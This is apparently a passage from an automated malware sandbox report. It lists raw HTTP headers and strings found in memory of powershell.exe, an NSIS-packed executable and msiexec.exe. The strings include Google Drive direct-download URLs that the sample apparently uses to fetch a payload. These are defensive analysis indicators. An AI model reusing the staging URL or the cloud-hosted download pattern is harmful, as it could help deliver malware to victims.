h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC47fJW4dYsaXMBnE0lJ0bde3xkcnqq7dHXwlcullPlaVQRPvSU8jNTWeRMnn4FBM958Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:03:08 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-g18axqFTU6km4TQ4ooILWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSfRdy_Jbp2fNRbbCD7NFphQxlphDceFU5Q06zU09coeGYWY82xAYgUm3G7FpG4LH8CShgiMjcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:03:10 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Lb_sSDRAtE5fEM40WWvXfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4PBI66ARl4aJKaGefMJ_PHjQ9MB8y-iH37QoOTLHvGr8Du0r0BnjJ2rDI5PTroErrXCf6aXTIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:03:13 GMTContent-Security-Policy: script-src 'nonce-wb0DFSVoOu-se2kCgfI-wA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQjhCxz4CKte9yQ-Z2gINnO46n2F2S1ddsHOre1OHL0AXygekP-wpwTFQpvHuqCVwtFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:03:16 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-n2daCCKKUbSM_DwFGkO4GQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000002.00000002.1776191402.0000000007720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microH
      Source: powershell.exe, 00000002.00000002.1769645096.0000000003404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microi
      Source: TVPfW4WUdj.exe, TVPfW4WUdj.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000002.00000002.1770102180.0000000005196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2302731731.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1812068844.0000000006369000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177430587.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2541790545.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2359079547.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222371219.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2518241517.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2336581381.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211383777.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2013685534.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2507565714.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1836071609.0000000006317000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2155297337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2554468315.0000000006372000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1928624482.000000000636B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.1773304254.00000000060A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222714717.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075142795.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2143694865.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109648798.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1954080969.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211417198.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2027022513.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2268082397.000000000632B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075142795.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109648798.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2098270407.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109737364.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2098333838.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/3
      Source: msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2188921511.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1847006851.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1847090543.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858746029.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2166712007.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1836022196.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858789773.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1835971025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177475867.000000000632B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/;
      Source: msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222714717.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2211417198.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2027022513.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2234687967.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060355604.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2049462072.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2049529809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2245474853.000000000632B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/N1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/N1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=downloads
      Source: msiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2155297337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075142795.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2143694865.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2166712007.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060355604.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2049462072.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2177475867.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2049529809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132210940.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/S
      Source: msiexec.exe, 00000007.00000003.2098333838.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2132210940.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP
      Source: msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1990751609.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1976166076.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1954080969.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1990599980.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1915078198.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942630171.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1976116569.0000000006328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP8
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP;
      Source: msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858746029.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858789773.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1915078198.000000000632B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPG
      Source: msiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1990751609.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1976166076.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075142795.0000000006325000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2109648798.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1954080969.000000000632C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPd3
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPe
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPi
      Source: msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1976166076.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1964751327.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1847006851.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1847090543.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858746029.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1954080969.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1836022196.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1858789773.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1835971025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1915078198.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942630171.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1976116569.0000000006328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLPst
      Source: msiexec.exe, 00000007.00000003.2086535481.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1930061025.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2060385642.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1892444748.000000000632D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2121435337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2086472437.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2665098123.00000000062FD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1869479461.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1931781129.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2038099809.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880918653.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2026978710.0000000006327000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2222714717.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1990751609.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2199945524.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1914979778.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2155297337.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2002823067.0000000006328000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1880949933.000000000632B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2075582832.000000000632C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.1942597274.0000000006328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: msiexec.exe, 00000007.00000002.2665098123.0000000006317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/)
      Source: msiexec.exe, 00000007.00000002.2665098123.00000000062FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0
